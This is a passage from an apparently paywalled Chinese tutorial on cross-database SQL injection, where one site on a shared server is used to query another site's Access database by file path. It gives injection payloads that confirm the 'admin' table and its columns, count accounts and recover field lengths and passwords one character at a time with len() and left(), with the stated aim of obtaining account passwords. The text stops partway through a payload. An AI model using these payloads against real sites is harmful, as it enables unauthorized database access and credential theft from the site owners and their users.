超级会员免费看
本文详细介绍了跨库注入的概念,特别是在同一服务器上的B站点注入A站点的情况。通过示例展示了如何判断目标数据库位置、存在表、字段以及如何猜解字段内容和长度。具体操作包括利用And条件判断表的数量和字段信息,以及通过left函数逐位猜解密码等关键步骤,最终达到获取账号密码的目的。
跨库注入之逐字猜解法
跨库注入适用环境↓
在B站点注入A站点。
前提,B和A在同服。
跨库目标位置
C:\Program Files\r3sec\#Data.mdb
判断存在的表↓
And 1=(Select Count(*) from [数据库路径].[表])
实际判断表的语句↓
And 1=(Select Count(*) from [C:\Program Files\r3sec\#Data.mdb].[admin])
判断字段
And 1=(Select Count(字段) from [数据库路径].[表])
猜帐号数量
And (Select Count(*) from [C:\Program Files\r3sec\#Data.mdb].[admin])>0
猜解字段长度
where len(字段)=5
//经常出错 兼容性不好。
4位
5位
16位
猜解字段内容
where left(字段,1)='a'
//指定字段内容,取1位
根据当前注入构造的语句↓
And 1=(Select Count(*) from [C:\Inetpub\wwwroot\1\Databases\0791idc.mdb].[admin] wh
订阅专栏 解锁全文
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
